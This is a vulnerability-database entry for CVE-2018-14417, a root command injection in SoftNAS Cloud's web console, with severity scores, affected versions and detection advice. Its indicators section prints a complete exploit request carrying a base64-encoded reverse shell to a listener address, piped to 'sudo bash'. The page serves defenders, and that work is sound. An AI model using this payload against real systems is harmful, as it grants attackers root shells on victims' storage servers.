cbcvebase.
CVE-2018-14417
published 2018-08-04

CVE-2018-14417: A command injection vulnerability was found in the web administration console in SoftNAS Cloud before 4.0.3. In particular, the snserv script did not sanitize…

PriorityP186critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOIT
Exploited in the wild
EPSS
89.58%
99.8th percentile
A command injection vulnerability was found in the web administration console in SoftNAS Cloud before 4.0.3. In particular, the snserv script did not sanitize the 'recentVersion' parameter from the snserv endpoint, allowing an unauthenticated attacker to execute arbitrary commands with root permissions.

Affected

1 ranges
VendorProductVersion rangeFixed in
softnascloud< 4.0.34.0.3

Detection & IOCsextracted from sources · hover to see the quote

url/softnas/snserver/snserv.php?opcode=checkupdate&opcode=executeupdate&selectedupdate=3.6aaaaaaa.1aaaaaaaaaaaaaa&update_type=standard&recentVersions=3.6aaaaaaaaaaa.1aaaaaaa;echo+YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4yLjQ1LjE4NS8xMjM0NSAwPiYx+|+base64+-d+|+sudo+bash;
path/softnas/snserver/snserv.php
commandecho YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4yLjQ1LjE4NS8xMjM0NSAwPiYx | base64 -d | sudo bash
path/softnas/applets/update/
  • Monitor HTTP GET requests to /softnas/snserver/snserv.php containing semicolons or shell metacharacters in the 'recentVersions' parameter, which indicate command injection attempts.
  • The snserv endpoint requires no authentication; alert on any unauthenticated requests to snserv.php with opcode=checkupdate or opcode=executeupdate from external/untrusted sources.
  • Detect base64-encoded reverse shell payloads piped through 'sudo bash' in web server request parameters, particularly the pattern 'base64 -d | sudo bash' in URL query strings.
  • Alert on the apache process spawning child shell processes (bash/sh) with sudo privileges, as exploitation results in root command execution via the apache sudoer configuration.
  • Dual opcode parameters in the same request (opcode=checkupdate&opcode=executeupdate) is a strong indicator of exploitation attempt against this vulnerability.
  • ·The sudoers configuration grants the apache user unrestricted root command execution (NOPASSWD: ALL), meaning any command injected via the web interface runs as root. This overly permissive sudoers entry is a key enabler of full system compromise.
  • ·The vulnerable snserv.php endpoint performs no authentication or session verification, making it reachable by any unauthenticated network attacker with access to the web administration console.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.